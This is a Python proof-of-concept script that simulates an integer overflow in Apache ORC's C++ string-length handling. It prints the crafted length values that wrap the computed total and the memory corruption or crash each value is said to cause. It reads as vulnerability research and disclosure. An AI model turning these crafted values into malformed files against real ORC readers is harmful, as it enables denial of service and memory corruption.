# Source: poc-orc-string-length-overflow / poc_orc_string_overflow.py
# Uploaded by 0xiviel with huggingface_hub ("Upload poc_orc_string_overflow.py"),
# commit ecf1516 (verified).
#!/usr/bin/env python3
"""
PoC: Apache ORC String Length Integer Overflow
===============================================
Root cause: ColumnReader.cc:697

    totalLength += static_cast<size_t>(lengths[i]);
    // lengths[i] is int64_t from unsigned RLE decoder — NO negative check

String lengths are decoded by an unsigned RLE decoder (isSigned=false, line 645)
but are stored as int64_t, so values >= 2^63 become negative. static_cast<size_t>
on a negative int64_t produces a huge size_t; summing such values leads either
to an enormous allocation (OOM) or to a total that wraps around to zero.
"""
import struct
# size_t / uint64_t arithmetic wraps modulo 2^64; Python ints do not, so the
# simulation below reduces explicitly.
_UINT64_MODULUS = 2**64


def _reinterpret_as_int64(value):
    """Return the signed 64-bit integer sharing the bit pattern of *value*.

    *value* must already be in the range ``0 <= value < 2**64``.
    """
    # Explicit "<" selects standard sizes (8 bytes) and a fixed byte order, so
    # the round-trip does not depend on the platform's native layout.
    return struct.unpack("<q", struct.pack("<Q", value))[0]


def show_overflow():
    """Print a walkthrough of the string-length overflow this PoC describes.

    The function performs no I/O other than writing to stdout. For each
    hard-coded list of unsigned 64-bit "lengths" it simulates, with Python
    integers reduced modulo 2**64, the accumulation
    ``totalLength += static_cast<size_t>(lengths[i])`` and prints the
    intermediate values plus the consequence the PoC attributes to the
    resulting total.

    Returns:
        None.
    """
    print("ORC StringDirectColumnReader::computeSize() Integer Overflow")
    print("=" * 60)
    print()
    print("Vulnerable code (ColumnReader.cc:691-706):")
    print(" size_t totalLength = 0;")
    print(" for (i = 0; i < numValues; ++i)")
    print(" totalLength += static_cast<size_t>(lengths[i]); // NO CHECK!")
    print()
    print("How negative lengths occur:")
    print(" 1. RLE decoder is unsigned (isSigned=false, line 645)")
    print(" 2. Output stored in int64_t* (line 715-718)")
    print(" 3. uint64 values >= 2^63 become negative int64_t")
    print(" 4. static_cast<size_t>(negative) = huge positive")
    print()

    # (description, unsigned 64-bit values as emitted by the RLE decoder)
    test_cases = [
        ("OOM DoS: single huge length", [2**63]),
        ("Wrap to 0: two lengths", [2**64 - 1, 1]),
        ("Wrap to 1: crafted pair", [2**64 - 100, 101]),
    ]
    for desc, uint_lengths in test_cases:
        print(f"Case: {desc}")
        total = 0
        for ul in uint_lengths:
            # The same 64 bits viewed as size_t (unsigned) and int64_t (signed).
            as_size_t = ul % _UINT64_MODULUS
            as_int64 = _reinterpret_as_int64(as_size_t)
            # Emulate size_t addition, which silently wraps on overflow.
            total = (total + as_size_t) % _UINT64_MODULUS
            print(f" RLE uint64={ul:#018x} -> int64={as_int64} -> size_t={as_size_t:#018x}")
        print(f" totalLength = {total} ({total:#018x})")
        # Totals between 1000 and 2**40 intentionally print no consequence
        # line; none of the cases above lands in that range.
        if total == 0:
            print(" -> blob.resize(0) -> EMPTY BLOB")
            print(" -> ptr += lengths[i] with negative -> WILD POINTER -> OOB read")
        elif total < 1000:
            print(f" -> blob.resize({total}) -> UNDERSIZED BUFFER")
            print(" -> actual data > blob size -> HEAP CORRUPTION")
        elif total > 2**40:
            print(f" -> blob.resize({total}) -> ALLOCATION FAILURE -> OOM CRASH")
        print()

    print("Additional: Stripe offset overflow (Reader.cc:591)")
    print(" stripeFooterStart = offset + index_length + data_length")
    print(" All uint64 from protobuf, no overflow check")
    print(" -> wraps around -> reads wrong file location")
    print()
    print("ORC C++ has ZERO safe arithmetic in core parsing code")
    print(" Reader.cc: 0 overflow checks in 1830 lines")
    print(" ColumnReader.cc: 0 overflow checks in 1793 lines")
# Run the walkthrough only when executed as a script, not when imported.
if __name__ == "__main__":
    show_overflow()